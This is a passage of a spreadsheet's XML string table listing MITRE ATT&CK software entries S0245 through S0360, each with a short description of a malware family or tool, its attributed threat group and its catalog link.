    <t>[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0245</t>
  </si>
  <si>
    <t>S0246</t>
  </si>
  <si>
    <t>HARDRAIN</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0246</t>
  </si>
  <si>
    <t>S0247</t>
  </si>
  <si>
    <t>NavRAT</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0247</t>
  </si>
  <si>
    <t>S0248</t>
  </si>
  <si>
    <t>yty</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0248</t>
  </si>
  <si>
    <t>S0249</t>
  </si>
  <si>
    <t>Gold Dragon</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0249</t>
  </si>
  <si>
    <t>S0250</t>
  </si>
  <si>
    <t>Koadic</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0250</t>
  </si>
  <si>
    <t>S0251</t>
  </si>
  <si>
    <t>Zebrocy</t>
  </si>
  <si>
    <t>[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, and VB.NET. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0251</t>
  </si>
  <si>
    <t>S0252</t>
  </si>
  <si>
    <t>Brave Prince</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0252</t>
  </si>
  <si>
    <t>S0253</t>
  </si>
  <si>
    <t>RunningRAT</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0253</t>
  </si>
  <si>
    <t>S0254</t>
  </si>
  <si>
    <t>PLAINTEE</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0254</t>
  </si>
  <si>
    <t>S0255</t>
  </si>
  <si>
    <t>DDKONG</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0255</t>
  </si>
  <si>
    <t>S0256</t>
  </si>
  <si>
    <t>Mosquito</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0256</t>
  </si>
  <si>
    <t>S0257</t>
  </si>
  <si>
    <t>VERMIN</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0257</t>
  </si>
  <si>
    <t>S0258</t>
  </si>
  <si>
    <t>RGDoor</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0258</t>
  </si>
  <si>
    <t>S0259</t>
  </si>
  <si>
    <t>InnaputRAT</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim's machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0259</t>
  </si>
  <si>
    <t>S0260</t>
  </si>
  <si>
    <t>InvisiMole</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by threat actors since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. (Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0260</t>
  </si>
  <si>
    <t>S0261</t>
  </si>
  <si>
    <t>Catchamas</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0261</t>
  </si>
  <si>
    <t>S0262</t>
  </si>
  <si>
    <t>QuasarRAT</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0262</t>
  </si>
  <si>
    <t>S0263</t>
  </si>
  <si>
    <t>TYPEFRAME</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0263</t>
  </si>
  <si>
    <t>S0264</t>
  </si>
  <si>
    <t>OopsIE</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0264</t>
  </si>
  <si>
    <t>S0265</t>
  </si>
  <si>
    <t>Kazuar</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0265</t>
  </si>
  <si>
    <t>S0266</t>
  </si>
  <si>
    <t>TrickBot</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0266</t>
  </si>
  <si>
    <t>S0267</t>
  </si>
  <si>
    <t>FELIXROOT</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0267</t>
  </si>
  <si>
    <t>S0268</t>
  </si>
  <si>
    <t>Bisonal</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014. (Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0268</t>
  </si>
  <si>
    <t>S0269</t>
  </si>
  <si>
    <t>QUADAGENT</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0269</t>
  </si>
  <si>
    <t>S0270</t>
  </si>
  <si>
    <t>RogueRobin</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0270</t>
  </si>
  <si>
    <t>S0271</t>
  </si>
  <si>
    <t>KEYMARBLE</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0271</t>
  </si>
  <si>
    <t>S0272</t>
  </si>
  <si>
    <t>NDiskMonitor</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0272</t>
  </si>
  <si>
    <t>S0273</t>
  </si>
  <si>
    <t>Socksbot</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that  abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0273</t>
  </si>
  <si>
    <t>S0274</t>
  </si>
  <si>
    <t>Calisto</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0274</t>
  </si>
  <si>
    <t>S0275</t>
  </si>
  <si>
    <t>UPPERCUT</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0275</t>
  </si>
  <si>
    <t>S0276</t>
  </si>
  <si>
    <t>Keydnap</t>
  </si>
  <si>
    <t>This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0276</t>
  </si>
  <si>
    <t>S0277</t>
  </si>
  <si>
    <t>FruitFly</t>
  </si>
  <si>
    <t>FruitFly is designed to spy on mac users  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0277</t>
  </si>
  <si>
    <t>S0278</t>
  </si>
  <si>
    <t>iKitten</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0278</t>
  </si>
  <si>
    <t>S0279</t>
  </si>
  <si>
    <t>Proton</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0279</t>
  </si>
  <si>
    <t>S0280</t>
  </si>
  <si>
    <t>MirageFox</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0280</t>
  </si>
  <si>
    <t>S0281</t>
  </si>
  <si>
    <t>Dok</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) steals banking information through man-in-the-middle  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0281</t>
  </si>
  <si>
    <t>S0282</t>
  </si>
  <si>
    <t>MacSpy</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0282</t>
  </si>
  <si>
    <t>S0283</t>
  </si>
  <si>
    <t>jRAT</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0283</t>
  </si>
  <si>
    <t>S0284</t>
  </si>
  <si>
    <t>More_eggs</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0284</t>
  </si>
  <si>
    <t>S0302</t>
  </si>
  <si>
    <t>Twitoor</t>
  </si>
  <si>
    <t>[Twitoor](https://attack.mitre.org/software/S0302) is an Android malware family that likely spreads by SMS or via malicious URLs. (Citation: ESET-Twitoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0302</t>
  </si>
  <si>
    <t>S0330</t>
  </si>
  <si>
    <t>Zeus Panda</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)'s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0330</t>
  </si>
  <si>
    <t>S0331</t>
  </si>
  <si>
    <t>Agent Tesla</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written in visual basic.(Citation: Fortinet Agent Tesla April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0331</t>
  </si>
  <si>
    <t>S0332</t>
  </si>
  <si>
    <t>Remcos</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0332</t>
  </si>
  <si>
    <t>S0333</t>
  </si>
  <si>
    <t>UBoatRAT</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0333</t>
  </si>
  <si>
    <t>S0334</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0334</t>
  </si>
  <si>
    <t>S0335</t>
  </si>
  <si>
    <t>Carbon</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0335</t>
  </si>
  <si>
    <t>S0336</t>
  </si>
  <si>
    <t>NanoCore</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0336</t>
  </si>
  <si>
    <t>S0337</t>
  </si>
  <si>
    <t>BadPatch</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0337</t>
  </si>
  <si>
    <t>S0338</t>
  </si>
  <si>
    <t>Cobian RAT</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0338</t>
  </si>
  <si>
    <t>S0339</t>
  </si>
  <si>
    <t>Micropsia</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0339</t>
  </si>
  <si>
    <t>S0340</t>
  </si>
  <si>
    <t>Octopus</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0340</t>
  </si>
  <si>
    <t>S0341</t>
  </si>
  <si>
    <t>Xbash</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0341</t>
  </si>
  <si>
    <t>S0342</t>
  </si>
  <si>
    <t>GreyEnergy</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0342</t>
  </si>
  <si>
    <t>S0343</t>
  </si>
  <si>
    <t>Exaramel for Windows</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0343</t>
  </si>
  <si>
    <t>S0344</t>
  </si>
  <si>
    <t>Azorult</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.
In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0344</t>
  </si>
  <si>
    <t>S0345</t>
  </si>
  <si>
    <t>Seasalt</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0345</t>
  </si>
  <si>
    <t>S0346</t>
  </si>
  <si>
    <t>OceanSalt</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0346</t>
  </si>
  <si>
    <t>S0347</t>
  </si>
  <si>
    <t>AuditCred</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0347</t>
  </si>
  <si>
    <t>S0348</t>
  </si>
  <si>
    <t>Cardinal RAT</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0348</t>
  </si>
  <si>
    <t>S0349</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0349</t>
  </si>
  <si>
    <t>S0350</t>
  </si>
  <si>
    <t>zwShell</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0350</t>
  </si>
  <si>
    <t>S0351</t>
  </si>
  <si>
    <t>Cannon</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0351</t>
  </si>
  <si>
    <t>S0352</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS.D</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0352</t>
  </si>
  <si>
    <t>S0353</t>
  </si>
  <si>
    <t>NOKKI</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0353</t>
  </si>
  <si>
    <t>S0354</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0354</t>
  </si>
  <si>
    <t>S0355</t>
  </si>
  <si>
    <t>Final1stspy</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0355</t>
  </si>
  <si>
    <t>S0356</t>
  </si>
  <si>
    <t>KONNI</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0356</t>
  </si>
  <si>
    <t>S0357</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0357</t>
  </si>
  <si>
    <t>S0358</t>
  </si>
  <si>
    <t>Ruler</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0358</t>
  </si>
  <si>
    <t>S0359</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0359</t>
  </si>
  <si>
    <t>S0360</t>
  </si>
  <si>
    <t>BONDUPDATER</t>
  </si>
  <si>
